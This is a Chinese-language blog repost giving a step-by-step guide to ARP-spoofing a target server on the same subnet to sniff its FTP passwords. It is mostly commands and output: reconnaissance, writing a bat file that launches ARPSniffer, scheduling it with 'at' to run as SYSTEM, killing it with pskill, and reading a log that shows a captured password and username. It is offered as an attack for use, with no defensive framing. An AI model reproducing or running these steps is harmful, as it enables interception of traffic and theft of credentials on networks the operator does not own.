典型攻擊之滲透攻擊必用命令與步驟(轉)
典型攻擊之滲透攻擊必用命令與步驟(轉)[@more@] 假設想攻擊的主機IP是:61.139.1.79 同一子網下我們已有許可權的主機IP是:61.139.1.88並可以3389登陸 第一步: tracert 61.139.1.1 C:WIN2000system32>tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hops: 1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1] Trace complete. 這就說明了你想攻擊的主機和你所在的主機在一個關網中那麼就有可能 進行ARPSNIFFER了 第二步:看本機IP設定和網路卡情況 C:WIN2000system32>ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : smscomputer Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Intel Fast Ethernet LAN Controller - onboard: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 61.139.1.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 61.139.1.65 DNS Servers . . . . . . . . . . . : 61.139.1.73 說明只有一塊網路卡那麼在執行ARPSNIFFER的時候就可以不要第五個引數了這個地 方小榕的主頁可沒有說喲,經過測試我發覺如果只有一塊網路卡你第五個引數使用0 的話也只能嗅探到透過自已的資料喲. 從上面我們還可以知道閘道器是61.139.1.65 第三步:檢視本機時間 C:WIN2000system32>net time 127.0.0.1 127.0.0.1 的當前時間是 2003/1/28 下午 09:13 命令完成成功 要注意的是這兒的時間是12小時式,用at命令應要24小時式 第四步:編寫啟動ARPsniffer的bat檔案 C:WIN2000system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:winnta.bat 注意咯我們沒有要第五個引數,如果有多個網路卡的話你就要先直接執行arpsniffer顯示如下: ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB 2002, security@vip.sina.com Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(這個地方選第五個引數) Usage: ArpSniffer [/RESET] 第五步:後臺執行開始嗅探咯 C:winntsystem32>at 127.0.0.1 20:44 c:winnta.bat 注意:這兒的時間要用24小時式 arpsniffer最好拷到system32目錄下,記錄檔案也會生成在這兒 執行完第四步要先安裝WINPCAP 2.1驅動 同時arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改登錄檔重啟機子 第六步:看密碼但是生成的記錄檔案不能直接看也不能複製所以我們只能先結束掉 以SYSTEM許可權啟動的ARPSniffer程式 C:winntsystem32>pulist ................... conime.exe 248 NT AUTHORITYSYSTEM explorer.exe 1864 SMSCOMPUTERAdministrator CSRSS.EXE 2256 NT AUTHORITYSYSTEM Arpsniffer.exe 2322 NT AUTHORITYSYSTEM ----就是它了! WINLOGON.EXE 2344 NT AUTHORITYSYSTEM ...................... 殺了它 C:winntsystem32>pskill 2322 PsKill v1.03 - local and remote process killer Copyright (C) 2000 Mark Russinovich Process 2322 killed. C:winntsystem32>type 1.txt 我的例子中嗅探的是FTP密碼:) ............... 61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb 61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 61.188.218.179(1404)->61.139.1.79(21)QUIT 61.188.218.179(1404)->61.139.1.79(21)QUIT 61.139.1.79(21)->61.188.218.179(1404)221 61.139.1.79(21)->61.188.218.179(1404)221 ............ ............ 特別要注意的就是PASS哈:) ---------------------------------------------------- 付錄: 前臺正常執行的顯示 C:>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB 2002, security@vip.sina.com Network Adapter 0: Intel(R) 8255x Based Network Connection Enable IP Router....OK Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02 Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6 Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88 Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88 有時這兒要先顯示can not open driver(0)不管它等一下就可以了 Begin Sniffer.........
·上一篇:·下一篇:
最新更新 | ||
······························ |
| ||
| | | | | | | | ||
| ||
Copyright © 2004 - 2007 All Rights Reserved
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970158/,如需轉載,請註明出處,否則將追究法律責任。
上一篇:
駭客技術大放送,欺騙IP攻擊的追蹤(轉)
下一篇:
菜鳥俱樂部之簡單肉雞製作大放送(轉)
請登入後發表評論
登入
全部評論
|
相關文章
- Kali linux滲透測試系列————28、Kali linux 滲透攻擊之社會工程學攻擊Linux
- 伺服器滲透測試之攻擊漏洞方法伺服器
- 滲透測試模擬黑客攻擊之蒐集資訊黑客
- 滲透測試服務之瀏覽器攻擊分析瀏覽器
- 滲透測試服務之伺服器攻擊手段伺服器
- Metasploit之後滲透攻擊(資訊收集、許可權提升)
- 滲透測試網站sql注入攻擊與防護網站SQL
- SQL隱碼攻擊之常見注入的步驟④SQL
- WEB三大攻擊之—SQL隱碼攻擊與防護WebSQL
- 淺談DDOS攻擊攻擊與防禦
- APP滲透測試 深入挖掘漏洞以及如何防止攻擊APP
- 黑客攻擊滲透測試的社會工程學利用黑客
- 滲透攻防Web篇-深入淺出SQL隱碼攻擊WebSQL
- WMI 的攻擊,防禦與取證分析技術之攻擊篇
- 攻擊JavaWeb應用[3]-SQL隱碼攻擊[1]JavaWebSQL
- 攻擊JavaWeb應用[4]-SQL隱碼攻擊[2]JavaWebSQL
- 滲透測試學習之探測和攻擊無線網路五
- 滲透測試學習之探測和攻擊無線網路六
- 滲透測試學習之探測和攻擊無線網路八
- 滲透測試學習之探測和攻擊無線網路九
- 滲透測試學習之探測和攻擊無線網路十
- 滲透測試學習之探測和攻擊無線網路十一
- 滲透測試學習之探測和攻擊無線網路一
- 滲透測試學習之探測和攻擊無線網路二
- 滲透測試學習之探測和攻擊無線網路三
- 滲透測試學習之探測和攻擊無線網路四
- 網站被攻擊滲透測試出漏洞怎麼辦網站
- 滲透測試:看“道德黑客”如何進行模擬攻擊黑客
- 黑客是如何利用DNS域傳送漏洞進行滲透與攻擊的?黑客DNS
- DDoS攻擊與CC攻擊的區別是什麼?
- SQL隱碼攻擊的原理及一般步驟SQL
- 如何進行滲透測試XSS跨站攻擊檢測
- 91%可被攻擊滲透,工業公司網路安全如何落實?
- 域滲透 | kerberos認證及過程中產生的攻擊ROS
- XXE攻擊攻擊原理是什麼?如何防禦XXE攻擊?
- WEB攻擊與防禦Web
- CSRF攻擊與防禦
- 網站遇到攻擊怎麼辦?常見攻擊有哪些?(轉)網站